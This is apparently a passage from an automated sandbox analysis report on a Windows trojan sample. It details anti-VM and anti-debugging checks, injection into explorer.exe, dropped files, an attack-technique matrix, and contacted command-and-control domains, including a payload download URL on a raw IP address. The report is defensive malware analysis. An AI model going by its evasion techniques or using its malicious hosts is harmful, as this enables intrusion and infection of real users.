      Source: C:\Windows\explorer.exe TID: 7052Thread sleep count: 313 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7124Thread sleep count: 267 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 7076Thread sleep count: 273 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2032Thread sleep count: 37 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 2208Thread sleep count: 102 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1620Thread sleep count: 81 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6916Thread sleep count: 2369 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 6916Thread sleep time: -236900s >= -30000sJump to behavior
      Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1797051096.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1795949633.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1797051096.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1790387901.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1795949633.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraSystem information queried: CodeIntegrityInformationJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_00401E65 rdtsc 7_2_00401E65
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02C4A133 push dword ptr fs:[00000030h]0_2_02C4A133
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]0_2_02FC0D90
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]0_2_02FC092B
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02CC0D90 mov eax, dword ptr fs:[00000030h]5_2_02CC0D90
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02CC092B mov eax, dword ptr fs:[00000030h]5_2_02CC092B
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 5_2_02D79F1B push dword ptr fs:[00000030h]5_2_02D79F1B
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA0D90 mov eax, dword ptr fs:[00000030h]7_2_02BA0D90
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02BA092B mov eax, dword ptr fs:[00000030h]7_2_02BA092B
      Source: C:\Users\user\AppData\Local\Temp\A869.exeCode function: 7_2_02C19F60 push dword ptr fs:[00000030h]7_2_02C19F60
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_02C30D90 mov eax, dword ptr fs:[00000030h]9_2_02C30D90
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_02C3092B mov eax, dword ptr fs:[00000030h]9_2_02C3092B
      Source: C:\Users\user\AppData\Roaming\ajvrjraCode function: 9_2_02CC9D20 push dword ptr fs:[00000030h]9_2_02CC9D20

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeFile created: ajvrjra.1.drJump to dropped file
      Source: C:\Windows\explorer.exeNetwork Connect: 190.224.203.37 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 190.220.21.28 80Jump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeThread created: C:\Windows\explorer.exe EIP: 13A19A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraThread created: unknown EIP: 32E19A8Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeThread created: unknown EIP: 8EF1970Jump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraThread created: unknown EIP: 9071970Jump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\vsvrjraSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\A869.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajvrjraSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1790038935.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1795949633.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1788539931.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1788836499.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\vsvrjraCode function: 10_2_00404E64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00404E64
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeCode function: 0_2_00415C20 InterlockedCompareExchange,ReadConsoleA,FindAtomW,SetConsoleMode,SearchPathW,SetDefaultCommConfigW,MoveFileW,GetVersionExW,DisconnectNamedPipe,ReadConsoleOutputW,GetModuleFileNameA,LCMapStringA,PulseEvent,SetCommState,GetConsoleAliasesLengthA,GetStringTypeExW,BuildCommDCBA,GetTimeFormatW,GetFileAttributesA,GetConsoleAliasExesLengthA,GetBinaryType,LoadLibraryA,InterlockedDecrement,0_2_00415C20

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2075687376.0000000002CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2440394206.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.2440584366.0000000002F11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2771763885.0000000003001000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2075723481.0000000002D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1816485243.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      32
      Process Injection
      11
      Masquerading
      OS Credential Dumping1
      System Time Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading
      12
      Virtualization/Sandbox Evasion
      LSASS Memory521
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
      Process Injection
      Security Account Manager12
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Hidden Files and Directories
      NTDS3
      Process Discovery
      Distributed Component Object ModelInput Capture115
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Software Packing
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      File Deletion
      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532278 Sample: LgigaSKsL6.exe Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 39 nwgrus.ru 2->39 41 ninjahallnews.com 2->41 43 fallhandbat.com 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 6 other signatures 2->51 8 LgigaSKsL6.exe 2->8         started        11 vsvrjra 2->11         started        13 ajvrjra 2->13         started        15 2 other processes 2->15 signatures3 process4 signatures5 69 Detected unpacking (changes PE section rights) 8->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->71 73 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->73 17 explorer.exe 62 6 8->17 injected 75 Multi AV Scanner detection for dropped file 11->75 77 Machine Learning detection for dropped file 11->77 79 Maps a DLL or memory area into another process 11->79 81 Checks if the current machine is a virtual machine (disk enumeration) 13->81 83 Creates a thread in another existing process (thread injection) 13->83 85 Switches to a custom stack to bypass stack traces 13->85 process6 dnsIp7 33 nwgrus.ru 190.224.203.37, 49736, 49737, 49738 TelecomArgentinaSAAR Argentina 17->33 35 23.145.40.164, 443, 49817 SURFAIRWIRELESS-IN-01US Reserved 17->35 37 190.220.21.28, 57093, 57094, 57095 AMXArgentinaSAAR Argentina 17->37 25 C:\Users\user\AppData\Roaming\vsvrjra, PE32 17->25 dropped 27 C:\Users\user\AppData\Roaming\ajvrjra, PE32 17->27 dropped 29 C:\Users\user\AppData\Local\Temp\A869.exe, PE32 17->29 dropped 31 C:\Users\user\...\vsvrjra:Zone.Identifier, ASCII 17->31 dropped 53 System process connects to network (likely due to code injection or exploit) 17->53 55 Benign windows process drops PE files 17->55 57 Deletes itself after installation 17->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->59 22 A869.exe 17->22         started        file8 signatures9 process10 signatures11 61 Detected unpacking (changes PE section rights) 22->61 63 Machine Learning detection for dropped file 22->63 65 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 22->65 67 4 other signatures 22->67

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      LgigaSKsL6.exe42%ReversingLabsWin32.Trojan.Generic
      LgigaSKsL6.exe40%VirustotalBrowse
      LgigaSKsL6.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\vsvrjra100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\A869.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\ajvrjra100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\vsvrjra42%ReversingLabsWin32.Trojan.Generic
      No Antivirus matches
      SourceDetectionScannerLabelLink
      nwgrus.ru12%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://aka.ms/odirmr0%VirustotalBrowse
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
      https://23.145.40.164/ksa9104.exe0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%VirustotalBrowse
      https://wns.windows.com/L0%VirustotalBrowse
      https://ninjahallnews.com/search.php0%VirustotalBrowse
      https://api.msn.com/q0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
      https://fallhandbat.com/search.php0%VirustotalBrowse
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%VirustotalBrowse
      https://api.msn.com/v1/news/Feed/Windows?&0%VirustotalBrowse
      https://www.rd.com/list/polite-habits-campers-dislike/0%VirustotalBrowse
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%VirustotalBrowse
      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%VirustotalBrowse
      https://www.msn.com:443/en-us/feed0%VirustotalBrowse
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      nwgrus.ru
      190.224.203.37
      truetrueunknown
      fallhandbat.com
      unknown
      unknowntrue
        unknown
        ninjahallnews.com
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://23.145.40.164/ksa9104.exetrueunknown
          https://ninjahallnews.com/search.phptrueunknown
          https://fallhandbat.com/search.phptrueunknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalseunknown
          http://schemas.miexplorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                https://excel.office.comexplorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.microexplorer.exe, 00000001.00000000.1797350947.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1791836520.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1792703988.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://api.msn.com/qexplorer.exe, 00000001.00000000.1795949633.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1799460114.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        unknown
                        https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1799460114.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://word.office.comexplorer.exe, 00000001.00000000.1799460114.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1790387901.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.micrexplorer.exe, 00000001.00000000.1797051096.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1790387901.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1790387901.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
